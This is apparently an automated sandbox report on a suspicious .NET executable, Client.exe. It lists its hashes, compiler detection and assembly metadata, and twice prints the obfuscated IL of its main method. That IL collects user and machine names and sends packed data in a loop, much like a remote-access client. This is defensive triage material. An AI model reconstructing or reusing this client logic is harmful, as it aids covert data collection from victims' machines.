Suspicious
Suspect

65eabb0907e9203ada9b06536bff98ed

PE Executable
|
MD5: 65eabb0907e9203ada9b06536bff98ed
|
Size: 516.11 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very high

Hash
Hash Value
MD5
65eabb0907e9203ada9b06536bff98ed
Sha1
9ae2ea215199833d5c518fb1b217c735bf9f2c7c
Sha256
f2c36ce0cd70a12aa17e902fb67b72cd1b1859c7b2b36dd3c9f6d43f54e58c5c
Sha384
3d57b94c34e2c2e7f812b9cb2898b07cdd2bc087e29958de1443b3dbe5a965b3a1947db37d79d206a557c975af8c56b1
Sha512
f23a4c92f1a8ed8d42306bcbe9c264509c2baee80f7fe9ae34a2cacd3f2caafe5150556b70c8bb13ba7c62fb87f4427f911a38be93c3186505e4ceffdac9aaa2
SSDeep
12288:gOD3qWMY19enG6fgCqvWb17Uw3uooO7Qn:lInxg+p7Uw/8n
TLSH
2EB419257FA98E00D590187ECA7E3A09CB16E0F125026347370AF7A25D459EEDE2D3DB

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
Information
Name
Value
Info

PE Detect: PeReader FAIL, AsmResolver Mapped OK

Info

Remap: Mapped -> FileLayout (RAM only) as [Rebuild from dump]_32966032.exe

Module Name

Client.exe

Full Name

Client.exe

EntryPoint

System.Void zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::LOiYpbGuPIAWlqImkfQO(System.String[])

Scope Name

Client.exe

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

Client

Assembly Version

1.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

.NETFramework,Version=v4.0

Total Strings

600

Main Method

System.Void zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::LOiYpbGuPIAWlqImkfQO(System.String[])

Main IL Instruction Count

167

Main IL

call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::CyhYWnGFinUmYYVjXsvCqBhc() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::NxJvqNIZmmhzw() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::EENrfOsuhM() stloc V_3 nop <null> ldloc V_3 call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::yplKFBQENJpwJsaMNlmojaqr() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::IWsBQiCmCi() br IL_000E: nop call System.Void zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::IWsBQiCmCi() call System.Void fNfyoRBBghVJGXvPKIQl.boUsWiWGUcFfJuVvXUUpGYA::wsXNMEfJuAqVdNIWVKiM() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::ERelKhLQtE call System.String vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::lGALCbwrKutfvD() call System.String HphkPDuyetsxBWEkB.uLCgLSWUmEQuQGyK::eXqLVadONuQpijdlyrG(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::pNNYNkQTYzadbgiAbUSdEhp call System.Void xghyPQiPgfOltUiCaaRYaWyT.NmtFPrBwmJqmydImB::ncFeENDrQvlFGNYmM() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::pNNYNkQTYzadbgiAbUSdEhp call System.Boolean fDDzULvQBKYMpVBDSnqsbyV.nKRLKVWdVinuVJSQrPXjHUkE::VzrLRGTFxvxjnrndWIe(System.String) brtrue IL_0080: call System.Void xvXXcYvdGeV.bAXgCgSkxOts::SoAVyJvzYoF() leave IL_0283: ret call System.Void xvXXcYvdGeV.bAXgCgSkxOts::SoAVyJvzYoF() call System.Void xghyPQiPgfOltUiCaaRYaWyT.qklEhIFcQqGUjoNHuHtq::hRENhVgVOAazWo() ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI ldfld System.Boolean fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo::CWAKwuqQyXqEHzMLPAnfqKZKf brtrue IL_026E: call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::INgqaVKcosucsmsZDBgn() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::DOELbWafTEHhFaXPuXZQYrtTV 
call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::dJCOSTQxAsYWOhkQuitOIDyFB() newarr System.Char dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::IuYLXytMcrOqvpYzJAC() call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::yEBXprxcpZKwMnKVYpUZdB() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random xghyPQiPgfOltUiCaaRYaWyT.qklEhIFcQqGUjoNHuHtq::fwOYqieFkCmwQAKwajxGxHF ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::tCEnDpJtyCL() newarr System.Char dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::EtBVfBQXCgRdHfDaTfdM() call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::zIUlEunffMuBGGcWUoXMeDMk() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::fXmiaTZzkEkgkbHdsW() ldelem System.String call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::XcBZaEyqFzSwwkKY() newarr System.Char dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::AwFsUCWBspkNPjlg() call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::MyeyLeccTzRHnwZClcvQbDZ() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI callvirt System.Void fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo::XuDpYndcaJEphODykCEg() ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI ldloc V_1 call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::XiOOdqQgPEXMuYpSdQB() ldelem System.String ldloc V_2 ldsfld System.Random xghyPQiPgfOltUiCaaRYaWyT.qklEhIFcQqGUjoNHuHtq::fwOYqieFkCmwQAKwajxGxHF ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 
System.Random::Next(System.Int32) ldelem System.String callvirt System.Void fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo::rbICZpAYVxjsXOXCgQOlqLYq(System.String,System.String) ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI ldfld System.Boolean fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo::CWAKwuqQyXqEHzMLPAnfqKZKf brfalse IL_026E: call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::INgqaVKcosucsmsZDBgn() ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI newobj System.Void PRIDPHmafeuivgwMcFrJQx.wJuNvPpDzZkYWdlMJPuCn::.ctor(fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo) stfld PRIDPHmafeuivgwMcFrJQx.wJuNvPpDzZkYWdlMJPuCn fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo::yphxJsTsUVrk ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI newobj System.Void xghyPQiPgfOltUiCaaRYaWyT.bfuFZKxikFyCs::.ctor(fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo) stfld xghyPQiPgfOltUiCaaRYaWyT.bfuFZKxikFyCs fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo::XeYcNSDUVFUfzYnIswpfowA ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::EtEtKKeGqP() newarr System.Object dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::JYzacQNzdjlsjY() call System.String vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::KfGWZTZYPRfOfY() call System.String HphkPDuyetsxBWEkB.uLCgLSWUmEQuQGyK::eXqLVadONuQpijdlyrG(System.String) stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::INmdnLCXadeUDS() call System.Byte[] 
xghyPQiPgfOltUiCaaRYaWyT.qklEhIFcQqGUjoNHuHtq::brCptOgDSVZarFUgaBrPJ() stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::JpzoNnuxMBPRX() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::nhndqtJsqHvWXz stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::TBUUxCRUNcEHBYx() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::IareIZnJQXqyVFofWUk stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::wJhRZvsvKZNPabYueDHcJzGPu() call System.String System.Environment::get_UserName() call System.String vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::LpGkRETTQelpK() call System.String HphkPDuyetsxBWEkB.uLCgLSWUmEQuQGyK::eXqLVadONuQpijdlyrG(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::cXjGmVAOFFjFtXJZJYpBul() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::rrNBVymSLoPE stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::KdxRUpwDRXk() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::EDLrHWDiciJGkrUPrEGE stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::ULEnrPLWSKYKjSj() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::XmKbaOBUdwvJVprsuohpXOJ stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::hatvqTYdoEfZJCSiIEoNFk() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::YOSIdGgqHjSKLmJ stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::liPlAEniBFGVqepcAnbynkmNP() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::vkHRCTkJzsh stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::qBeeWkxcHMaiYZBVdTCgbDT() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::xKKTuuVDiwAsFaLVkpLis stelem.ref 
<null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::naelKBvCVINlDXjVYN() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::ZZnujpBSvoaanltCfTIza stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::cBSPBxRGSKjQniCqv() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::rFPiVBumnrBY stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::LSFRYMPLPSFk() call System.String xghyPQiPgfOltUiCaaRYaWyT.qklEhIFcQqGUjoNHuHtq::bqKlWClqwHYQZqUN() stelem.ref <null> call System.Byte[] wQYsWkdVzGrayjetPsy.zXtkNqddifrOSat::vGxTDUUCJs(System.Object[]) callvirt System.Void fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo::sTZioycnfldvOD(System.Byte[]) call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::INgqaVKcosucsmsZDBgn() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI pop <null> leave IL_0283: ret ret <null>

Module Name

Client.exe

Full Name

Client.exe

EntryPoint

System.Void zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::LOiYpbGuPIAWlqImkfQO(System.String[])

Scope Name

Client.exe

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

Client

Assembly Version

1.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

.NETFramework,Version=v4.0

Total Strings

600

Main Method

System.Void zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::LOiYpbGuPIAWlqImkfQO(System.String[])

Main IL Instruction Count

167

Main IL

call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::CyhYWnGFinUmYYVjXsvCqBhc() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::NxJvqNIZmmhzw() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::EENrfOsuhM() stloc V_3 nop <null> ldloc V_3 call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::yplKFBQENJpwJsaMNlmojaqr() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::IWsBQiCmCi() br IL_000E: nop call System.Void zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::IWsBQiCmCi() call System.Void fNfyoRBBghVJGXvPKIQl.boUsWiWGUcFfJuVvXUUpGYA::wsXNMEfJuAqVdNIWVKiM() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::ERelKhLQtE call System.String vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::lGALCbwrKutfvD() call System.String HphkPDuyetsxBWEkB.uLCgLSWUmEQuQGyK::eXqLVadONuQpijdlyrG(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::pNNYNkQTYzadbgiAbUSdEhp call System.Void xghyPQiPgfOltUiCaaRYaWyT.NmtFPrBwmJqmydImB::ncFeENDrQvlFGNYmM() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::pNNYNkQTYzadbgiAbUSdEhp call System.Boolean fDDzULvQBKYMpVBDSnqsbyV.nKRLKVWdVinuVJSQrPXjHUkE::VzrLRGTFxvxjnrndWIe(System.String) brtrue IL_0080: call System.Void xvXXcYvdGeV.bAXgCgSkxOts::SoAVyJvzYoF() leave IL_0283: ret call System.Void xvXXcYvdGeV.bAXgCgSkxOts::SoAVyJvzYoF() call System.Void xghyPQiPgfOltUiCaaRYaWyT.qklEhIFcQqGUjoNHuHtq::hRENhVgVOAazWo() ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI ldfld System.Boolean fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo::CWAKwuqQyXqEHzMLPAnfqKZKf brtrue IL_026E: call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::INgqaVKcosucsmsZDBgn() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::DOELbWafTEHhFaXPuXZQYrtTV 
call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::dJCOSTQxAsYWOhkQuitOIDyFB() newarr System.Char dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::IuYLXytMcrOqvpYzJAC() call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::yEBXprxcpZKwMnKVYpUZdB() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random xghyPQiPgfOltUiCaaRYaWyT.qklEhIFcQqGUjoNHuHtq::fwOYqieFkCmwQAKwajxGxHF ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::tCEnDpJtyCL() newarr System.Char dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::EtBVfBQXCgRdHfDaTfdM() call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::zIUlEunffMuBGGcWUoXMeDMk() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::fXmiaTZzkEkgkbHdsW() ldelem System.String call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::XcBZaEyqFzSwwkKY() newarr System.Char dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::AwFsUCWBspkNPjlg() call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::MyeyLeccTzRHnwZClcvQbDZ() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI callvirt System.Void fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo::XuDpYndcaJEphODykCEg() ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI ldloc V_1 call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::XiOOdqQgPEXMuYpSdQB() ldelem System.String ldloc V_2 ldsfld System.Random xghyPQiPgfOltUiCaaRYaWyT.qklEhIFcQqGUjoNHuHtq::fwOYqieFkCmwQAKwajxGxHF ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 
System.Random::Next(System.Int32) ldelem System.String callvirt System.Void fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo::rbICZpAYVxjsXOXCgQOlqLYq(System.String,System.String) ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI ldfld System.Boolean fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo::CWAKwuqQyXqEHzMLPAnfqKZKf brfalse IL_026E: call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::INgqaVKcosucsmsZDBgn() ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI newobj System.Void PRIDPHmafeuivgwMcFrJQx.wJuNvPpDzZkYWdlMJPuCn::.ctor(fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo) stfld PRIDPHmafeuivgwMcFrJQx.wJuNvPpDzZkYWdlMJPuCn fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo::yphxJsTsUVrk ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI newobj System.Void xghyPQiPgfOltUiCaaRYaWyT.bfuFZKxikFyCs::.ctor(fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo) stfld xghyPQiPgfOltUiCaaRYaWyT.bfuFZKxikFyCs fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo::XeYcNSDUVFUfzYnIswpfowA ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::EtEtKKeGqP() newarr System.Object dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::JYzacQNzdjlsjY() call System.String vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::KfGWZTZYPRfOfY() call System.String HphkPDuyetsxBWEkB.uLCgLSWUmEQuQGyK::eXqLVadONuQpijdlyrG(System.String) stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::INmdnLCXadeUDS() call System.Byte[] 
xghyPQiPgfOltUiCaaRYaWyT.qklEhIFcQqGUjoNHuHtq::brCptOgDSVZarFUgaBrPJ() stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::JpzoNnuxMBPRX() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::nhndqtJsqHvWXz stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::TBUUxCRUNcEHBYx() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::IareIZnJQXqyVFofWUk stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::wJhRZvsvKZNPabYueDHcJzGPu() call System.String System.Environment::get_UserName() call System.String vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::LpGkRETTQelpK() call System.String HphkPDuyetsxBWEkB.uLCgLSWUmEQuQGyK::eXqLVadONuQpijdlyrG(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::cXjGmVAOFFjFtXJZJYpBul() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::rrNBVymSLoPE stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::KdxRUpwDRXk() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::EDLrHWDiciJGkrUPrEGE stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::ULEnrPLWSKYKjSj() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::XmKbaOBUdwvJVprsuohpXOJ stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::hatvqTYdoEfZJCSiIEoNFk() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::YOSIdGgqHjSKLmJ stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::liPlAEniBFGVqepcAnbynkmNP() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::vkHRCTkJzsh stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::qBeeWkxcHMaiYZBVdTCgbDT() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::xKKTuuVDiwAsFaLVkpLis stelem.ref 
<null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::naelKBvCVINlDXjVYN() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::ZZnujpBSvoaanltCfTIza stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::cBSPBxRGSKjQniCqv() ldsfld System.String zVjamdXTgzdEsepWwSqyc.fNMqgINdzOA::rFPiVBumnrBY stelem.ref <null> dup <null> call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::LSFRYMPLPSFk() call System.String xghyPQiPgfOltUiCaaRYaWyT.qklEhIFcQqGUjoNHuHtq::bqKlWClqwHYQZqUN() stelem.ref <null> call System.Byte[] wQYsWkdVzGrayjetPsy.zXtkNqddifrOSat::vGxTDUUCJs(System.Object[]) callvirt System.Void fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo::sTZioycnfldvOD(System.Byte[]) call System.Int32 vEsKREADGKnQixgrDMjoTBSJ.RLAWjbuWqSo::INgqaVKcosucsmsZDBgn() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld fNfyoRBBghVJGXvPKIQl.JLutlxKgwceYMzZJBbEEQjPyo zVjamdXTgzdEsepWwSqyc.LmzCMlKQiheBUzYJAiYO::JuThWcevVpI pop <null> leave IL_0283: ret ret <null>

Artefacts
Name
Value
PE Layout

MemoryMapped (process dump suspected)

PE Layout

MemoryMapped (process dump suspected)

65eabb0907e9203ada9b06536bff98ed (516.11 KB)
File Structure
Characteristics
No malware configuration was found at this point.
Artefacts
Name
Value Location
PE Layout

MemoryMapped (process dump suspected)

65eabb0907e9203ada9b06536bff98ed

PE Layout

MemoryMapped (process dump suspected)

65eabb0907e9203ada9b06536bff98ed > [Rebuild from dump]_32966032.exe
